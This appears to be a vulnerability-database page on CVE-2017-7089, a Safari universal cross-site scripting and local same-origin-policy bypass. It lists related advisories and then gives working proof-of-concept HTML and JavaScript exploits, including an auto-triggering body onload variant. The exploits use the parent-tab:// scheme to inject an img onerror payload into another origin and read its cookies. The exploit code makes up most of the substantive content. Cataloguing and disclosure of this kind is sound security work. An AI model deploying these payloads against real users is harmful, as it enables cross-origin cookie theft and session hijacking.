| Reporter | Title | Published | Views | Family All 54 |
|---|---|---|---|---|
| Safari 10 Local SOP bypass Vulnerability | 5 Oct 201700:00 | – | zdt | |
| WebKitGTK+ Code Execution / Cookie Handling / Memory Corruption Vulnerabilities | 19 Oct 201700:00 | – | zdt | |
| webkit2-gtk3 -- multiple vulnerabilities | 18 Oct 201700:00 | – | freebsd | |
| Exploit for Cross-site Scripting in Apple Safari | 3 Oct 201712:13 | – | githubexploit | |
| Apple Safari < 11.0 Multiple Vulnerabilities | 8 Apr 201900:00 | – | nessus | |
| Apple iOS < 11.0 Multiple Vulnerabilities (APPLE-SA:APPLE-SA-2017-09-19-1) | 17 Apr 201900:00 | – | nessus | |
| Apple iOS < 11.0.1 Multiple Vulnerabilities | 17 Apr 201900:00 | – | nessus | |
| Apple iOS < 11 Multiple Vulnerabilities | 21 Sep 201700:00 | – | nessus | |
| FreeBSD : webkit2-gtk3 -- multiple vulnerabilities (1ce95bc7-3278-11e8-b527-00012e582166) (Spectre) | 29 Mar 201800:00 | – | nessus | |
| macOS : Apple Safari < 11.0 Multiple Vulnerabilities | 20 Sep 201700:00 | – | nessus |
<!--
# CVE-2017-7089
**Impact**: Processing maliciously crafted web content may lead to universal cross site scripting
**Description**: A logic issue existed in the handling of the parent-tab. This issue was addressed with improved state management.
#### Safari 10
##### Local SOP bypass
```html
<script> function Pew(){var doc=open('parent-tab://apple.com');doc.document.body.innerHTML='<img src=q onerror=alert(document.cookie)>';}</script><button onclick=Pew();>Click me!</button>
```
##### Exploit by Frans Rosén
```html
data:text/html,<script>function y(){x=open('parent-tab://google.com','_top'),x.document.body.innerHTML='<img/src=""onerror="alert(document.cookie)">'};setTimeout(y,100)</script>
```
-->
<body onload=document.getElementById('pew').click()>
<a id='pew' href='data:text/html,<script>function y(){x=open('parent-tab://apple.com','_top'),x.document.body.innerHTML='<img/src=""onerror=alert(document.domain);alert(document.cookie);>'};setTimeout(y,100)</script>'>hello</a>
</body>Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation